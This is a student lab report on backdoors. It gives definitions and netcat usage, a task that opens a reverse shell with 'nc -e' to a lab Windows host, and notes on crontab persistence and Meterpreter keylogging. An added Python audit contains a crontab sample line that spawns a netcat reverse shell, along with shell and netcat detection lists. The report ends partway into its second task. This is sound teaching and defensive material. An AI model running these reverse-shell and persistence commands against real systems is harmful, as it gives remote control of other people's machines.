2019-2020-2 20175335 Tenzin Norbu "Network Warfare Technology" Exp2: Backdoor Principles and Practice
Prior knowledge before the practice
(1) Backdoors
Broad concept
In the broad sense, a backdoor is any access channel into a system that bypasses the normal authentication process.
It may exist in the following places:
- A compiler that plants a backdoor in the programs it builds
- An operating system that ships with a backdoor
- An application that ships with a backdoor
- A dedicated backdoor program lurking in the operating system or disguised as a particular application
Narrow concept
In the narrow sense, a backdoor has the following characteristics:
- It is a program specifically designed as a backdoor, lurking in the operating system
- A malicious attacker can connect to this program
- and execute arbitrary commands remotely
- The concept overlaps with that of a Trojan
(2) Common backdoors
2.1 nc or netcat
ncat is a low-level tool for basic TCP/UDP sending and receiving. It is usually combined with other tools, and in that combination it plays the role of a backdoor.
Linux and macOS ship with nc.
On Windows, download "ncat.rar" from the course's Gitee repository (https://gitee.com/wildlinux/NetSec/attach_files) and unzip it before use.
View the usage instructions: man nc
Connect to a remote host: nc [-options] hostname port[s] [ports]
Bind a port and wait for a connection: nc -l port [-options] [hostname] [port]
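To show what the two nc modes above do at the TCP level, here is an added example (not part of the lab report or of netcat itself) that rebuilds the listen side and the connect side with Python's socket module. The listener binds and waits, the client connects and sends bytes, and each side returns what it saw; port number, addresses and the payload are all chosen by the example and run on 127.0.0.1 only.

```python
# Added example, not from the lab report: a minimal netcat-style exchange in
# Python's socket module, showing what `nc -l port` and `nc host port` do at
# the TCP level. One side binds and waits, the other connects; each side then
# sends and receives raw bytes. Runs entirely on 127.0.0.1 with an OS-chosen port.
import socket
import threading


def listen_and_reply(ready, result):
    """Listener side, like `nc -l port`: bind, accept one connection, echo back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0 lets the OS pick a free port
    srv.listen(1)
    result["port"] = srv.getsockname()[1]
    ready.set()                          # tell the connecting side which port to use
    conn, _peer = srv.accept()
    with conn:
        data = conn.recv(4096)
        result["received_by_listener"] = data
        conn.sendall(b"echo: " + data)   # send bytes back over the same socket
    srv.close()


def connect_and_send(port, payload):
    """Connecting side, like `nc host port`: connect, send bytes, read the reply."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(payload)
        return c.recv(4096)


def nc_roundtrip(payload=b"hello from the connecting side\n"):
    """Run both ends in one process and return what each side saw."""
    ready = threading.Event()
    result = {}
    t = threading.Thread(target=listen_and_reply, args=(ready, result))
    t.start()
    ready.wait(5)                        # wait until the listener is bound
    reply = connect_and_send(result["port"], payload)
    t.join(5)
    result["reply_seen_by_client"] = reply
    return result


if __name__ == "__main__":
    r = nc_roundtrip()
    print("listener received:", r["received_by_listener"])
    print("client got back:  ", r["reply_seen_by_client"])
```

The listener calls listen() before signalling the client, so the connection is queued even if accept() has not yet run; that ordering is the same reason the practice tasks start the listening side first.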
(3) Basic questions answered
- Can you give examples of possible ways a backdoor could get into your system?
  - When an application is downloaded from an unofficial website, it may be bundled with other software, which leaves a backdoor in the system.
- Can you give examples of how a backdoor starts up (on Windows and on Linux)?
  - Windows: set it to start at boot, or modify the registry
  - Linux: in this experiment, crontab is used to start it at a scheduled time; a backdoor can also be injected as shellcode into normal software
- Which Meterpreter function impressed you most?
  - After backdooring a host, you can control its shell directly, and even its audio and video; with the keylogger you can easily obtain passwords and other information
- How do you find out whether a backdoor has been installed on your own system?
  - Install antivirus software and scan the system at regular intervals
  - Check the firewall to see whether there are abnormal ports
Common backdoor practice
Task one: Windows gets a Linux shell
1. On Windows, use the ipconfig command to view the machine's IP: 172.16.135.135
2. Use ncat.exe to listen on local port 5335.
3. In the Kali environment, use the nc command with the -e option to make a reverse connection to port 5335 on the Windows host.
4. Kali's shell is obtained successfully, as shown below:
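The answer above to "how do you find out whether a backdoor has been installed" was to look for abnormal ports, and the crontab answer described how the backdoor is scheduled to start. The following added example (written for this report, not part of it or of any tool it uses) turns both answers into a small audit: it parses constructed sample lines in the column layout of `ss -tanp` and of a crontab, and flags a shell or nc process holding an established connection (which is what step 3's `nc -e` produces on the Kali side), listening ports outside an allowlist, and cron entries that launch netcat. The sample lines, the allowlist and the process names are assumptions made for the example; the IP and port values echo the task's 172.16.135.135:5335.

```python
# Added example (not from the lab report): an audit that applies the report's
# own detection advice, "check for abnormal ports", plus a crontab check, to
# the kind of backdoor the tasks set up. All input below is constructed for
# the example, not captured output; the allowlist is an assumption.
import re

# Constructed lines in the column layout of `ss -tanp` (State, Recv-Q, Send-Q,
# Local Address:Port, Peer Address:Port, Process).
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port      Peer Address:Port      Process
LISTEN 0      128    0.0.0.0:22              0.0.0.0:*              users:(("sshd",pid=611,fd=3))
LISTEN 0      5      0.0.0.0:4444            0.0.0.0:*              users:(("nc",pid=4020,fd=3))
ESTAB  0      0      172.16.135.130:44212    172.16.135.135:5335    users:(("sh",pid=2311,fd=3))
ESTAB  0      0      172.16.135.130:50110    172.16.135.1:443       users:(("firefox",pid=1820,fd=57))
"""

# Constructed crontab; the second line is the persistence style the report
# describes (crontab starting the backdoor at a scheduled time).
CRONTAB_SAMPLE = """\
0 3 * * * /usr/bin/apt-get update
42 * * * * /bin/nc -e /bin/sh 172.16.135.135 5335
"""

ALLOWED_LISTEN_PORTS = {22}                 # assumption: only sshd is expected to listen
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
NETCAT = {"nc", "ncat", "netcat", "ncat.exe"}

# Pulls the process name and pid out of users:(("name",pid=N,fd=M))
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Yield (state, local_port, peer, process_name, pid) from ss-style lines."""
    for line in text.splitlines()[1:]:      # skip the header row
        parts = line.split()
        if len(parts) < 6:
            continue
        state, local, peer, proc = parts[0], parts[3], parts[4], parts[5]
        m = PROC_RE.search(proc)
        name = m.group(1) if m else "?"
        pid = int(m.group(2)) if m else -1
        yield state, int(local.rsplit(":", 1)[1]), peer, name, pid


def audit_sockets(text, allowed=ALLOWED_LISTEN_PORTS):
    """Flag unexpected listeners and shells/netcat holding live connections."""
    findings = []
    for state, port, peer, name, pid in parse_ss(text):
        if state == "LISTEN" and port not in allowed:
            findings.append(f"unexpected listener on port {port} ({name}, pid {pid})")
        # A shell interpreter normally never owns a TCP socket; nc -e makes it do so.
        if state == "ESTAB" and (name in SHELLS or name in NETCAT):
            findings.append(f"{name} (pid {pid}) holds a connection to {peer}")
    return findings


def audit_crontab(text):
    """Flag cron entries whose command runs netcat."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)        # five time fields, then the command
        if len(fields) < 6:
            continue
        command = fields[5]
        if any(tok.rsplit("/", 1)[-1] in NETCAT for tok in command.split()):
            findings.append(f"cron entry starts netcat: {command}")
    return findings


def run_audit(ss_text=SS_SAMPLE, cron_text=CRONTAB_SAMPLE):
    return audit_sockets(ss_text) + audit_crontab(cron_text)


if __name__ == "__main__":
    for finding in run_audit():
        print("FINDING:", finding)
```

On a real host the same functions can be fed the output of `ss -tanp` and `crontab -l`; the allowlist should be replaced by the ports the machine is actually expected to serve.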
Task two: Linux gets a Windows shell
1. In the Kali environment, use ifconfig to view the IP: